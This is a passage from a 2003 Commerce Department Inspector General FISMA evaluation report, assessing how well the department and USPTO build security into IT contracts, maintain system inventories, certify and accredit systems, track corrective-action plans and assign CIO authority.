contracts.\n\nWe conducted our evaluation using FISMA; OMB Circular A-130, Appendix III, \xe2\x80\x9cSecurity of\nFederal Automated Information Resources\xe2\x80\x9d; DOC IT Security Program Policy and Minimum\nImplementation Standards; the National Information Assurance Certification and Accreditation\nProcess (NIACAP)11; and the following NIST special publications: Security Self-Assessment\nGuide for Information Technology Systems (800-26), Risk Management Guide for Information\nTechnology Systems (800-30), Guide for Developing Security Plans for Information Technology\nSystems (800-18), and Contingency Planning Guide for Information Technology Systems (800\n34). OIG contractors conducted the general control reviews of financial systems against criteria\ncontained in GAO\xe2\x80\x99s Federal Information System Controls Audit Manual (FISCAM).\n\nThe structure and content of this report are designed to be responsive to the guidance provided\nby OMB in Reporting Instructions for the Federal Information Security Management Act, while\nalso providing useful information for Commerce officials. As directed in this guidance, we\nbegin with question A.2.a. We are issuing our report in final because it makes no new\nrecommendations.\n\nWe performed this evaluation in accordance with the Inspector General Act of 1978, as\namended, and the Quality Standards for Inspections, March 1993, issued by the President\xe2\x80\x99s\nCouncil on Integrity and Efficiency. We conducted our fieldwork between October 2002 and\nAugust 2003.\n\n\n\n\n10\n   OMB guidance directs agencies to develop plans of action and milestones (POA&Ms) to remediate program- and \n\nsystem-level IT security weaknesses and track each deficiency until it is corrected. \n\n11\n   National Security Agency, National Information Assurance Certification and Accreditation Process (NIACAP), \n\nNational Security Telecommunications and Information Systems Security Instruction No. 1000. NIACAP \n\nestablishes the minimum standards for certifying and accrediting national security systems. Its use is required by the \n\nDepartment\xe2\x80\x99s information security policy for sensitive but unclassified systems. \n\n\n                                                          2\n\n\x0cU.S. Department of Commerce                                                   Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                      September 2003\n\n\n\nOverview of FISMA IT Security Review\n\n                                 Total number of programs, systems, and\n                                 contractor operations or facilities\n                                 evaluated in FY 2003. (OMB Question A.2.a)\n\n\nIn FY 2003 we assessed a total of 43 systems in 9 of the Department\xe2\x80\x99s 14 operating units (see\ntable 1), and 24 contracts in 5 of those operating units.\n\nTable 1. Operating Unit Systems Assessed in FY 2003\n\n                 Office of the Secretary                   National Oceanic and Atmospheric Administration\nCommerce Administrative Management System*                                     (NOAA)\n          Bureau of Economic Analysis (BEA)                                    NOAA Headquarters\nNational Income and Wealth Division                        Data Center*\nIndustry Economics Division\n                                                             National Environmental Satellite Data and Information\nLocal Area Network\n                                                                                Service (NESDIS)\n         Bureau of Industry and Security (BIS)\n                                                           Headquarters Local Area Network\nExport Control Automated Support System\nBureau Communication Infrastructure                        Research Data System\nTreaty Compliance/Information Management System #1         Integrated Program Office Local Area Network\n                     Census Bureau                                  National Marine Fisheries Service (NMFS)\nNational Processing Center                                 Headquarters Local Area Network\nGeography                                                  Headquarters Wide Area Network\nData Centers*                                                             National Ocean Service (NOS)\n         Economic Development Agency (EDA)                 Coastal Services Center IT Support System\nData Center*\n                                                           Nautical Charting System\n    National Institute of Standards and Technology\n                                                           Office of Coast Survey Support Hydrographic Support Sys.\n                         (NIST)\nManufacturing Engineering Laboratory Office System                       National Weather Service (NWS)\nTime Scale and Network Time Services                       NOAA Weather Radio\nNetwork Infrastructure (Gaithersburg)                      WSR-88D Weather Radar (NEXRAD)\nNetwork Infrastructure (Boulder)                           Advanced Weather Interactive Processing System\nBoulder E-mail Server System                               Kansas City Weather Forecast Office\nData Center*                                               Salt Lake City Weather Forecast Office\n    National Technical Information Service (NTIS)          Kansas City River Forecast Center\nAutomated Document Storage and Retrieval\n                                                           National Centers for Environmental Prediction\nComputing Information Service Publishing\n                                                               Office of Oceanic and Atmospheric Research (OAR)\nPC and Network\nData Center*                                               Office of Global Programs\nUnited States Patent and Trademark Office (USPTO)          NOAA Profiler Network Central Facility\nNetwork Perimeter System                                   Space Environment Center\nFinancial Management Systems*                              Boulder Campus Network\n\n\n*Review of IT Controls to Support the FY 2002 Consolidated Financial Statement Audit\n\n\n\n\n                                                      3\n\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\n\n                                                 FINDINGS\n\n\n\n     Information security in\n                                      I. Information Security in IT Service Contracts Is\n     IT service contracts.               Improving, but Additional Efforts Are Needed\n     (OMB Question A.2.b-e)\n                                  In fiscal year 2002, Commerce\xe2\x80\x99s IT expenditures totaled nearly\n                                  $500 million (43 percent of all its contract obligations). More\nthan two-thirds of that amount (approximately $334 million) was for IT services. In the absence\nof rigorous security provisions in contract documents, this heavy reliance on contractor services\nleaves Commerce systems and data highly vulnerable to security violations.\n\nIn support of our FY 2002 independent evaluation, we reviewed 40 contracts12 awarded by\nseveral operating units including USPTO. Across the board, we found the contracts had either\ninsufficient security provisions or none at all, and we concluded that federal and departmental\npolicy and guidance for incorporating such provisions were lacking.\n\nIn the intervening year, the Department issued a new information security policy, which\nemphasizes that IT security officers, system owners,13 contracting offices, and contracting\nofficers\xe2\x80\x99 technical representatives (COTRs) must work together to ensure that information\nsecurity is addressed throughout the acquisition process, and provides guidance on monitoring\ncontractors who have access to departmental systems and data. To support these requirements,\nthe CIO Office, the Office of Acquisition Management (OAM), and the Office of Human\nResources Management (OHRM) have developed a security training module for procurement\nprofessionals, which is undergoing departmental review. In an April 2003 amendment to a\npolicy memorandum, OAM reemphasized the need for including information security provisions\nin contracts.\n\nOAM has also drafted a standard contract provision for safeguarding the security of unclassified\nsystems and information, which is also undergoing department review.14 The provision requires,\namong other things, a system security plan and certification and accreditation for contracted IT\nresources/services that involve connection to Commerce networks or storage of Commerce data\non contractor-owned systems. OAM\xe2\x80\x99s assessment of current contracts and solicitations\nidentified more than 300 needing modification to incorporate appropriate security provisions.\nHowever, OAM is not planning to advise contracting officers to modify the deficient contracts\nuntil the draft provision is issued in final. With no date for issue set, we are concerned by the\nabsence of interim action to mitigate security risks posed by these contracts.\n\n12\n   The term \xe2\x80\x9ccontract\xe2\x80\x9d includes task orders and delivery orders issued under multiple award contracts and\ngovernment-wide agency contracts (GWACs).\n13\n   The Department\xe2\x80\x99s information security policy defines a system owner as a project manager with day-to-day\nmanagement and operational control over the system and direct oversight of the system/network administrators and\noperations staff.\n14\n   Similarly, the Civilian Agency Acquisition Council is working on a draft change to the Federal Acquisition\nRegulation that would ensure that information security is included in IT acquisitions, but the timeframe for its\ncompletion is unclear.\n\n\n                                                        4\n\n\x0cU.S. Department of Commerce                                      Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                         September 2003\n\n\n\n\nAlthough a formal provision has not been completed, our FY 2003 independent evaluation did\nnote some progress in incorporating security into IT service contracts. Our review of\n24 contracts awarded during this fiscal year by the Office of the Secretary, NOAA Headquarters,\nNIST, Census, and USPTO found that contract documents contained at least minimal provisions\nfor security. Contracts typically require risk and suitability assessments and background\nclearances for contractors working in government facilities; and some require contractors to\nattend security awareness training and follow information security procedures.\n\nHowever, we found only two contracts that contained most of the elements of the draft provision.\nIn addition, we found little evidence of appropriate review of contractor compliance with\nsecurity requirements, or of contracting staff working with COTRs and information security\noffices\xe2\x80\x94as mandated in the Department\xe2\x80\x99s new policy\xe2\x80\x94to ensure that security is addressed\nduring development of contract requirements and statements of work. We believe the general\nabsence of such provisions and the inadequate interface among all staff involved in the\ncontracting/IT security process continue to place Commerce systems and data at risk.\n\nContracts should improve once OAM\xe2\x80\x99s standard provision is finalized and contracting staff are\ntrained to use it. However, it is essential that communication improve among contracting,\ntechnical, and information security staffs when planning, executing, and administering contracts\nthat include IT services. These personnel have significant management and oversight\nresponsibility, and they must work as a team to ensure that security is adequately addressed in\ncontract planning and development of requirements and performance measures, so that\ncontractor accountability may be established. They must also work together to assess contractor\ncompliance with security requirements, and document contract files accordingly.\n\n\n\n\n                                               5\n\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\n\nII. The Department Is Continuing to Refine Its                  Agency\xe2\x80\x99s work to develop an\n    Systems Inventory                                           inventory of major IT systems.\n                                                                (OMB Question A.2.f)\nIn January 2003, the Department issued an updated and\nexpanded information security policy that provides comprehensive requirements and direction\nfor the operating units in conducting their own information security programs. The Department\nviews system inventory control as the foundation for managing the information security\nprogram, and the policy requires all operating units to maintain a comprehensive inventory of\nclassified and unclassified IT systems that provides security information (including dates for the\nmost recent risk assessment, security plan approval, contingency plan and related testing,\ncertification and accreditation, and self-assessment). It also must include the dates of audits\nperformed by external entities such as OIG, the General Accounting Office (GAO), or the\nDepartment within the previous 12 months. All operating units including USPTO must provide\na copy of their inventory to the Department\xe2\x80\x99s IT security program manager twice a year.\n\nCommerce\xe2\x80\x99s CIO Office is reviewing the inventory data as part of its compliance review\nprogram, which is designed to validate the security information reported by operating units and\nassess the effectiveness of their information security programs. This year\xe2\x80\x99s inventory review is\nfocusing on whether operating units are properly applying NIST criteria in defining system\nboundaries. (The Department\xe2\x80\x99s intent is to review information security for all systems over a\n3-year cycle. To streamline information security management, particularly the certification and\naccreditation process, some operating units have reassessed system boundaries and redefined\nsystems, thereby significantly reducing their inventories. For example, in FY 2002, the\nDepartment reported that Census had 82 systems; the March 2003 system inventory identifies\nonly 8 Census systems. While it is appropriate to define systems in a way that facilitates their\nadministration, it is important that the definitions be logical and meaningful and that Department\nand operating unit management have sufficient information about the number and type of IT\nassets in the organization.\n\n\n\n\n                                                 6\n\n\x0cU.S. Department of Commerce                                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                          September 2003\n\n\n\n\n\n                                             III. The Department Should Continue to Report\n     Material weaknesses.\n     (OMB Question A.3)                           Information Security as a Material Weakness\n\n                                     FISMA requires that significant deficiencies in information\nsecurity policy, procedures, or practices be reported as material weaknesses. OMB Circular\nA-130 instructs agencies to identify security deficiencies pursuant to OMB Circular A-123,\n\xe2\x80\x9cManagement Accountability and Control,\xe2\x80\x9d if it is determined that there is no assignment of\nsecurity responsibility, no security plan, or no accreditation. The agency\xe2\x80\x99s decision to report a\nmaterial weakness should depend on the risk and magnitude of harm posed by the weakness. For\nthe past 2 fiscal years, the Department reported information security as a material weakness in its\nAccountability Report. In our independent evaluation last year, we stated that the Department\nshould continue to report information security as a material weakness until all systems that are\nnational critical (part of the critical infrastructure) and mission critical have been certified and\naccredited. The Department established a goal of certifying and accrediting these systems by the\nend of FY 2003.\n\nAs discussed in Finding XI, in this year\xe2\x80\x99s evaluation we that found numerous systems reported as\ncertified and accredited have significant deficiencies in their certification and accreditation\nmaterials. For example, we found risk assessments and security plans that have no basis for\ndetermining appropriate security controls; identify sensitivity levels that are not commensurate\nwith the requirements for confidentiality, integrity, and availability of the information handled;\nand do not fully and accurately describe the system environment and interconnections. In most\ncases, there was no evidence that security controls had been tested. We also found systems that\nhad either no contingency plans or whose plans specified no measures for recovering IT services\nfollowing an emergency or system disruption. Few contingency plans had evidence of testing.\nThese problems call into question the effectiveness of the certification and accreditation\nprocesses being used.\n\nThe Department\xe2\x80\x99s new policy requires compliance with the National Information Assurance\nCertification and Accreditation Process (NIACAP), which establishes minimum certification and\naccreditation standards. The operating units are currently working to improve the content and\nquality of their certification and accreditation processes and materials to comply with NIACAP,\nand some units are attempting to rework existing certifications and accreditations by September\n30, including some that we reviewed.15\n\nGiven the shortcomings in the systems we evaluated, however, we do not believe that\ncertification and accreditation of the Department\xe2\x80\x99s roughly 340 national-critical and mission-\ncritical systems16\xe2\x80\x94of sufficient quality and content\xe2\x80\x94can be completed by the end of the fiscal\nyear. Thus, while the Department should be commended for its focused efforts to certify and\naccredit, we believe that information security should be reported as a material weakness for\nFY 2003. We have worked closely with the Department CIO on information security concerns\nthroughout the year, and he has indicated agreement with our conclusion.\n\n15\n     We obtained certification and accreditation materials from the operating units in June and July 2003.\n16\n     The number of systems is based on the Department\xe2\x80\x99s March 2003 system inventory.\n\n                                                            7\n\n\x0cU.S. Department of Commerce                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                            September 2003\n\n\n\nUSPTO\nAs noted earlier, USPTO submits its Accountability Report separate from the rest of the\nDepartment. Last year we found that the agency lacked current certifications and accreditations\nfor its systems and suggested that it report information security as a material weakness until its\nmission-critical systems are certified and accredited. (USPTO has no systems designated as\nnational critical). USPTO reported information security as a material weakness in its FY 2002\nAccountability Report. In response to last year\xe2\x80\x99s evaluation, the agency indicated that it would\nrank its systems by risk and criticality, and certify and accredit all high-risk systems by the end\nof FY 2003, and the balance by the end of FY 2004.\n\nThe agency subsequently revised its systems inventory by consolidating more than 100 systems\ninto 19 systems, 9 mission critical and the remainder business essential. It planned to have its 9\nmission-critical systems and 1 classified system certified and accredited by the end of FY 2003.\nAs of mid-September, all 10 systems had undergone certification testing, 5 had been granted\ninterim accreditations, and 1 had received final accreditation. USPTO expects to grant the\nremaining 4 systems 120-day interim accreditations by the end of the fiscal year. USPTO is\nemploying a sound certification and accreditation process that includes rigorous testing of\nsecurity controls. Interim accreditations are not granted without comprehensive security plans,\ntesting, and risk assessments, with final accreditations given after problems identified in\ncertification testing have been corrected.\n\nAs discussed in Finding XI, our review of USPTO\xe2\x80\x99s certification and accreditation materials\ndemonstrates that it has made an extremely conscientious effort to employ a disciplined process\naccording to the NIACAP standard, including rigorous testing of security controls. And this\nprocess has been effective: it has identified numerous risks that must be addressed before all\nsystems receive full accreditation. We reported in last year\xe2\x80\x99s evaluation that the Director of\nUSPTO has made a commitment to protect the bureau\xe2\x80\x99s information assets; the certification and\naccreditation program, under the leadership of USPTO\xe2\x80\x99s CIO, confirms this commitment. But\nbecause of the risks identified and the lack of final accreditations, we believe that USPTO should\nreport information security as a material weakness for FY 2003.\n\n\n\n\n                                                 8\n\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 2003\n\n\n\n\nIV. The Department Has Established a Sound Plan of\n    Action and Milestone (POA&M) Process                         Agencywide plan of action\n                                                                 and milestone process.\nFISMA requires each agency to develop, document, and             (OMB Question A.4)\nimplement an information security program that includes a\nremedial process for addressing any deficiencies in its information security policies, procedures,\nand practices. OMB guidance states that agency program officials must develop, implement, and\nmanage corrective action plans, referred to as POA&Ms, for all systems that support their\noperations and assets. It also states that CIOs must develop, implement, and manage corrective\naction plans for all programs and systems they operate and control.\n\nThe requirements for POA&Ms are specified in the Department\xe2\x80\x99s new information security\npolicy and are responsive to the criteria contained in OMB\xe2\x80\x99s FY 2003 FISMA guidance. The\nDepartment develops, implements, and manages POA&Ms for all of its systems that have\nidentified security weaknesses. System owners are required to prepare the POA&Ms for their\nsystems, and the operating unit IT security officer prepares the POA&M for the unit\xe2\x80\x99s program.\nOperating units are required to submit their POA&Ms, including the status of corrective actions,\nto the Department CIO Office monthly.\n\nThe Department monitors POA&Ms closely and uses them to manage corrective actions for all\nidentified weaknesses. Our reviews at Census, ITA, NIST, and NOAA indicate that POA&Ms in\nthese operating units are being implemented in accordance with the Department\xe2\x80\x99s guidance.\nOIG has access to all POA&Ms, but because many are based primarily on self-assessments,\nwhich may not identify all weaknesses, we place greater reliance for identifying weaknesses on\nindependent reviews. Commerce\xe2\x80\x99s POA&M database does not include the accounting codes\nassociated with each line of the IT budget request, and IT system and budget reviews do not\nformally take into account the content of the POA&Ms, although attention is given to\ninformation security in these reviews. Commerce plans to tie POA&Ms to the system budget\nrequest in FY 2004. Our evaluation of the Commerce\xe2\x80\x99s process against OMB\xe2\x80\x99s criteria is\npresented in table 2.\n\nUSPTO\nLike the Department, USPTO develops, implements, and manages POA&Ms for systems that\nhave identified security weaknesses. The agency\xe2\x80\x99s CIO Office develops the POA&Ms,\ncollaborating with program officials to ensure that information security weaknesses are\naddressed. The CIO closely monitors the POA&Ms and uses them to manage corrective actions\nfor identified weaknesses. OIG has access to all POA&Ms, but relies more heavily on\nindependent reviews. To satisfy OMB\xe2\x80\x99s guidance, program officials at USPTO need to have\nprimary responsibility for the POA&Ms for systems that support their operations. USPTO has\nbeen submitting its POA&Ms directly to OMB; beginning in FY 2004, it will submit them to the\nDepartment CIO Office for incorporation into Commerce\xe2\x80\x99s consolidated report to OMB. Table 3\npresents our evaluation of USPTO\xe2\x80\x99s process against OMB\xe2\x80\x99s criteria.\n\n\n\n\n                                                9\n\n\x0cU.S. Department of Commerce                                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                            September 2003\n\n\n\n\nTable 2: Evaluation of Department\xe2\x80\x99s POA&M Process\n\n                                                         Criterion\n              OMB FISMA Criteria                          Met?                               OIG Evaluation\n                                                          (Y/N)\n\nAgency program officials develop, implement, and                     Program officials must record in POA&Ms any deficiencies\nmanage POA&Ms for every system under their                           found through an external review, internal self-assessment, or\n                                                            Y\nresponsibility with noted IT security weaknesses.                    compliance review, and must track corrections to completion.\n\nAgency program officials report at least quarterly to\n                                                            Y        Reporting is monthly.\nthe CIO on their remediation progress.\n\nAgency CIO develops, implements, and manages                         Operating unit CIOs must record in POA&Ms any deficiencies\nPOA&Ms for every system under their responsibility          Y        found through an external review, internal self-assessment, or\nwith noted IT security weaknesses.                                   compliance review, and must track corrections to completion.\n\n\nThe agency CIO centrally tracks and maintains all                    The Department CIO centrally tracks and maintains all\n                                                            Y\nPOA&M activities on at least a quarterly basis.                      POA&M activities on a monthly basis.\n\n                                                                     The POA&Ms contain all known security weaknesses, are\nThe POA&M is the authoritative agency and IG\n                                                                     closely monitored by the Department, and are used to manage\nmanagement tool to identify and monitor agency\n                                                                     corrective actions. Because many POA&Ms are based\nactions for correcting information and IT security          Y\n                                                                     primarily on self-assessments, which may not identify all\nweaknesses.\n                                                                     weaknesses, OIG places greater reliance for identifying\n                                                                     weaknesses on independent reviews.\n\nSystem-level POA&Ms are tied directly to the system\n                                                                     The Department plans to ensure that POA&Ms are tied to the\nbudget request through the IT business case as\n                                                            N        system budget request in FY 2004, but does not do so\nrequired in OMB budget guidance (Circular A-11) so\n                                                                     currently.\nas to justify IT security funds in the budget process.\n\n\nAgency IGs are an integral part of the POA&M                         All weaknesses identified by OIG are included in corrective\n                                                            Y\nprocess and have access to agency POA&Ms.                            action plans. OIG has access to all POA&Ms.\n\n\nThe agency's POA&M process prioritizes agency IT                     A formal prioritization process does not exist. However,\nsecurity weaknesses to ensure that significant                       reviews of POA&Ms at the operating unit and Department\n                                                            Y\nweaknesses are addressed in a timely manner and                      level appear to ensure that significant weaknesses are\nreceive, where necessary, appropriate resources.                     addressed in a timely manner.\n\n\n\n\n                                                             10\n\n\x0cU.S. Department of Commerce                                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                            September 2003\n\n\n\n\nTable 3: Evaluation of USPTO\xe2\x80\x99s POA&M Process\n\n                                                        Criterion\n             OMB FISMA Criteria                          Met?                          OIG Evaluation\n                                                         (Y/N)\n\n                                                                    All weaknesses found through an external review, internal\nAgency program officials develop, implement, and                    self-assessment, or compliance review are recorded in\nmanage POA&Ms for every system under their                          POA&Ms. However, program officials do not develop\n                                                           N\nresponsibility with noted IT security weaknesses.                   the POA&Ms. Rather, they are developed by the CIO\n                                                                    Office, in collaboration with program officials.\n\n\n\n                                                                    USPTO\xe2\x80\x99s CIO works collaboratively with program\nAgency program officials report at least quarterly to\n                                                           Y        officials to track remediation progress. Reporting is\nthe CIO on their remediation progress.\n                                                                    quarterly.\n\n\n\n\nAgency CIO develops, implements, and manages                        USPTO\xe2\x80\x99s CIO records in a POA&M any deficiencies\nPOA&Ms for every system under their responsibility         Y        found through an external review, internal self-\nwith noted IT security weaknesses.                                  assessment, or compliance review.\n\n\n\n\nThe agency CIO centrally tracks and maintains all                   USPTO\xe2\x80\x99s CIO centrally tracks and maintains all POA&M\n                                                           Y\nPOA&M activities on at least a quarterly basis.                     activities quarterly.\n\n\n                                                                    The POA&Ms contain all known security weaknesses, are\nThe POA&M is the authoritative agency and IG                        closely monitored by USPTO, and are used to manage\nmanagement tool for identifying and monitoring                      corrective actions. Because many POA&Ms are based\n                                                           Y\nagency actions to correct information and IT security               primarily on self-assessments, which may not identify all\nweaknesses.                                                         weaknesses, OIG places greater reliance for identifying\n                                                                    weaknesses on independent reviews.\nSystem-level POA&Ms are tied directly to the\nsystem budget request through the IT business case                  As of its September 2003 submission, USPTO\xe2\x80\x99s\nas required in OMB budget guidance (Circular A-11)         Y        POA&Ms have unique identifiers that link them to the\nto tie the justification for IT security funds to the               appropriate system budget request.\nbudget process.\n\n                                                                    All weaknesses identified by OIG are included in\nAgency IGs are an integral part of the POA&M\n                                                           Y        USPTO\xe2\x80\x99s corrective action plans. OIG has access to all\nprocess and have access to agency POA&Ms.\n                                                                    POA&Ms.\n\nThe agency's POA&M process represents a\nprioritization of agency IT security weaknesses that\n                                                                    USPTO\xe2\x80\x99s CIO reviews the POA&Ms monthly to track\nensures that significant IT security weaknesses are        Y\n                                                                    progress and determine priorities.\naddressed in a timely manner and receive, where\nnecessary, appropriate resources.\n\n\n\n\n                                                             11\n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n         Responsibilities of Agency Head\n\n     Steps taken by the agency head to                      V. Responsibilities and Authorities Are\n     clearly and unambiguously set forth                       Clearly Specified for the Department\n     FISMA\xe2\x80\x99s responsibilities and\n     authorities for the agency CIO and\n                                                               CIO and Operating Unit Officials\n     program officials, and actions to\n     implement and enforce these steps.             The responsibilities and authorities for the\n     (OMB Question B.1)                             Department\xe2\x80\x99s CIO and program officials have\n                                                    been clearly specified in the new information\n                                                    security policy. This policy, is part of the\nDepartment\xe2\x80\x99s Information Technology Management Handbook, which details and clarifies the\nCIO\xe2\x80\x99s authorities set forth in Department Organization Order (DOO) 15-23, \xe2\x80\x9cChief Information\nOfficer.\xe2\x80\x9d It was through this order that the Secretary delegated to the CIO responsibility for\ndeveloping and implementing a departmental information security program to ensure the\nconfidentiality, integrity, and availability of IT resources. The handbook is itself a DAO and is\nthus the authority for policies and regulations regarding IT resource management throughout\nCommerce.\n\nDepartment CIO. The new policy makes the Department\xe2\x80\x99s CIO responsible for overseeing\nCommerce\xe2\x80\x99s information security program; ensuring an appropriate level of protection for all\ndepartmental information resources; issuing policy and guidance that establish a framework for\nan information security program for the Department and its operating units; ensuring that\nfunding and resources are committed for the program\xe2\x80\x99s staffing, training, and support and for\nimplementing system safeguards; and monitoring, evaluating, and reporting to the Deputy\nSecretary on the status of information security within the Department.\n\nFISMA requires agency heads to delegate to their CIO the authority for ensuring compliance\nwith the Act. In a recent decision memorandum, the Secretary explicitly delegated the requisite\nauthorities to the Commerce CIO. The specific authorities are that the CIO (1) designate a senior\nagency information security officer; (2) develop and maintain an agencywide information\nsecurity program, as well as information security policies, procedures, and control techniques;\n(4) train and oversee personnel with significant responsibilities for information security; and\n(5) provide assistance to senior agency officials concerning their information security\nresponsibilities.\n\nOperating unit heads. The policy gives operating unit heads explicit responsibility for their\nunit\xe2\x80\x99s information security. Unit heads are required to communicate to all employees the\nimportance of information security to the unit\xe2\x80\x99s and Department\xe2\x80\x99s mission; assign management\nof IT systems to responsible program officials (e.g., heads of line offices and major operating\nunit components); ensure that the operating unit has an established information security program\nto protect its systems; and serve as the designated approving official (DAA)17 for systems that\nsupport the operating unit\xe2\x80\x99s mission. (DAA authority may be delegated to a program official.)\n\n\n\n17\n  The DAA is the official with the authority to accredit systems, i.e., formally assume responsibility for operating a\nsystem at an acceptable level of risk.\n\n                                                          12\n\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 2003\n\n\n\nProgram officials. The policy charges program officials\xef\xa3\xa7members of an operating unit\xe2\x80\x99s top-\nlevel management team (e.g., heads of line offices and directors of major operating unit\ncomponents)\xef\xa3\xa7with ensuring implementation of an effective information security program for\nthe systems they oversee; assigning responsibility for daily system operations and security to\nsystem owners; serving as the DAA, when so designated by the unit head, for systems that\nsupport the operating unit\xe2\x80\x99s mission; and ensuring availability of adequate resources for\nimplementing IT security activities.\n\nThe Commerce-wide information security program, which is overseen by the Department\xe2\x80\x99s CIO,\nprovides the foundation for enforcing unit responsibilities and authorities. This program requires\neach operating unit to have its own information security program and documented policy that\nconform to departmental policy. The Department CIO\xe2\x80\x99s responsibilities and authorities are, in\nturn, enforced through his reporting on information security to the Deputy Secretary.\n\nAs we have noted in our previous independent evaluations, the Secretary issued an information\nsecurity memorandum in July 2001 to secretarial officers and heads of operating units, in which\nhe gave greater specificity to these officials\xe2\x80\x99 responsibilities, and charged them with assuring\ncompliance with information security directives. The memorandum stated that information\nsecurity should be given high priority and sufficient resources and that secretarial officers and\nunit heads are expected to personally invest the time needed to achieve and maintain full\ncompliance with information security improvement directives coming from the Department\xe2\x80\x99s\nnewly developed IT management restructuring plan. This plan was designed to enhance the\nauthority and effectiveness of operating unit CIOs. One of its provisions was that unit heads (or\ntheir designee) must establish CIO performance plans and evaluate this official\xe2\x80\x99s performance in\nconsultation with the Department CIO. This requirement further helps ensure that information\nsecurity receives the requisite attention.\n\nAt the end of last fiscal year, the Deputy Secretary highlighted to operating unit heads the\ninformation security improvements needed in their organizations: accompanied by the CIO and\nchief financial officer (CFO), the Deputy Secretary reviewed unit heads\xe2\x80\x99 progress toward\nmeeting the President's Management Agenda, addressing information security and related\nweaknesses in light of the agenda\xe2\x80\x99s E-Gov component.\n\nOver the past 2 years, the Deputy Secretary has reinforced the Secretary\xe2\x80\x99s emphasis on\ninformation security, and provided the Department CIO with strong support for its improvement.\nIndeed, we believe the progress made by Commerce in information security is attributable not\nonly to the formal authority granted to the CIO position and the vigorous efforts made by the\nDepartment CIO, but also to the Deputy Secretary\xe2\x80\x99s support, which has significantly enhanced\nthe CIO\xe2\x80\x99s effectiveness. Simply stated, operating unit heads understand that information security\nis a priority for the Deputy Secretary and that they need to be responsive to issues raised by the\nDepartment CIO.\n\nIn addition, corrective actions at NIST demonstrate that operating unit heads are better\nrecognizing their new responsibilities. Last year we performed an in-depth review of NIST\xe2\x80\x99s\ninformation security program, which identified numerous weaknesses. In response to our\nfindings, the NIST director took significant improvement actions. This year, we found that NIST\n\n\n                                               13\n\n\x0cU.S. Department of Commerce                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                            September 2003\n\n\n\nhas made excellent progress in responding to our concerns and improving its information\nsecurity program. As we recommended, NIST has established a CIO organization and appointed\na full-time CIO; is improving its information security policies, including its policy for\ncertification and accreditation; has refined its systems inventory; is working to track\ncollaborators and researchers who are not on NIST campuses but who use NIST computing\nresources; and is implementing a capital planning and investment control process for IT.\n\nUSPTO\n\nThe responsibilities and authorities for USPTO\xe2\x80\x99s CIO and program officials are delineated in\nAgency Administrative Order 212-4, Information Technology Security, as are the responsibilities\nfor the CIO Office to ensure the policy is implemented and enforced. At the time of our\nfieldwork, this policy was in draft, but was expected to be finalized by the end of the fiscal year.\nThe draft policy addresses FISMA\xe2\x80\x99s requirement that heads of agencies accord the CIO the\nauthority to ensure compliance with the Act by stating that the USPTO Director has delegated\nresponsibility for all information security policies to the USPTO CIO. Currently, the CIO is\nworking with senior program officials to ensure they understand their responsibilities for\ninformation security and to address any related concerns they may have. In the meantime, the\npolicy is being refined to ensure that roles and responsibilities are clear and that its provisions\ncomply with OMB Circular A-130 and FISMA.\n\nIn our independent evaluation last year, we reported that USPTO had long-standing information\nsecurity weaknesses requiring senior management attention. The agency\xe2\x80\x99s CIO had been in\nplace a short period of time when we began our work. After we brought our concerns to his\nattention, he and the agency\xe2\x80\x99s director began a concerted effort to improve the information\nsecurity program, including devoting more resources to it and working to upgrade policy,\ncontrols, and oversight. The results of their effort are evident in a considerably enhanced\nprogram.\n\n\n\n\n                                                14\n\n\x0cU.S. Department of Commerce                                           Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                              September 2003\n\n\n\n\nVI. \t Significant IT Investments Require CIO\n                                                                     Authority for IT\n      Concurrence                                                    investment decisions.\n                                                                     (OMB Question B.2)\nNo operating unit can make a major IT investment without the\nDepartment CIO\xe2\x80\x99s review and concurrence. The Commerce\nInformation Technology Review Board (CITRB), cochaired\nby the CIO and CFO, was established to support IT investment decision making. The\nDepartment CIO, with input from the board, recommends to the Secretary and Deputy Secretary,\nthrough the Office of Budget, whether a proposed IT project should be funded. His FY 2005\nbudget guidance to operating unit CIOs emphasized that effective information security remains\nan important factor in the board\xe2\x80\x99s consideration of budget requests and provided the criteria\nagainst which the board evaluates a request\xe2\x80\x99s information security content.\n\nThe board evaluates new and ongoing IT investments designated by the Department\xe2\x80\x99s CIO.\nSystems are designated for review if they merit special attention due to their sensitivity, mission\ncriticality, or risk; if their resources are shared among operating units; or if their life cycle cost\nexceeds $25 million. The board must also review IT projects costing more than $10 million and\nrequiring a contract, as well as selected smaller projects, before the acquiring operating unit can\nreceive authority to make a contractual commitment. According to the CIO, greater emphasis is\nbeing placed on information security in contracts in these reviews. The board periodically\nreviews the status of approved projects, and the CIO, in turn, uses the results of these reviews to\nrecommend whether a project should be continued, modified, or terminated.\n\nOther IT initiatives that meet certain thresholds must prepare capital asset plans (Exhibit 300)\nsubject to the Department CIO\xe2\x80\x99s approval, but do not necessarily go before the board. For\noperating units without approved strategic and operational IT plans, this threshold is $500,000 in\nlife-cycle costs. Operating units and NOAA line offices with approved plans have a threshold of\n$10 million, and the threshold for NOAA line offices without approved plans is $2.5 million.\nAll other significant projects must be approved by the operating unit CIO.\n\nUSPTO\n\nIn July 2003, USPTO\xe2\x80\x99s CIO issued a draft IT capital planning and investment control process\nguide to provide a structured, integrated process for managing IT investments. The planning and\ncontrol process is intended to ensure that all IT investments align with the agency\xe2\x80\x99s mission and\nstrategic plan, and support business needs while minimizing risks and maximizing returns\nthroughout the investment\xe2\x80\x99s life cycle. A management council consisting of USPTO senior\nexecutives, including the CIO, reviews and approves the agency\xe2\x80\x99s budget, including IT\ninvestments. The council also must approve all new initiatives, including IT investments, having\na life-cycle cost greater than $100,000. Only those IT investments with which the 